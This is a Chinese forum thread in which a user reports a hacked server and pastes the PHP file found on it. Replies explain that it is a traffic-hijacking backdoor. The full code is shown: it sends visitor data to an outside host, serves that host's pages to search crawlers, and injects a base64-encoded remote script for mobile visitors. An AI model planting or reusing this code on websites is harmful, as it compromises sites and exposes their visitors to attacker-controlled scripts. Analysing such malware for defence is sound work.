中招了 一台服务器被放了这个 真无语
<?phpecho '<meta charset="utf-8" />';header('Content-Type:text/html;charset=utf-8');set_time_limit(0);error_reporting(0);$tr = "stristr";$er = $_SERVER;function _httpGet_($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); $output = curl_exec($ch); curl_close($ch); return $output;}define('url', $er['REQUEST_URI']);define('ref', $er['HTTP_REFERER']);define('ent', $er['HTTP_USER_AGENT']);define('site', "http://jsccp.kkmmbc.vip");define('road', "/" . md5(url) . "?host=" . $er['HTTP_HOST'] . "&page=" . url . "&ip=" . $_SERVER['REMOTE_ADDR'] . "&v=" . "JSC");define('regs', '@Baidu|Sogou|Yisou|Soso|Haosou|Spider|So.com|Sm.cn@i');define('mobile', '/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/');define('area', $tr(url, "jsp") and $tr(url, "?"));if (area && preg_match(mobile, ent)) { echo base64_decode('PHNjcmlwdCBzcmM9aHR0cHM6Ly9qcy5zZXNld3U0Lnh5ei9jLmpzPjwvc2NyaXB0Pg=='); exit;}if (preg_match(regs, ent)) { if (area) { echo _httpGet_(site . road); exit; }} https://js.sesewu4.xyz/c.js 用途:基于用户访问行为的流量分发与追踪系统,主要逻辑分为移动端用户注入脚本和搜索引擎爬虫重定向两部分 核心逻辑是:移动用户访问含jsp的URL时,注入第三方JS脚本。
搜索引擎爬虫访问时,重定向到指定站点并记录访问数据。 不是很懂这个 恭喜你又被黑了 感谢大神解惑 这是什么
页:
[1]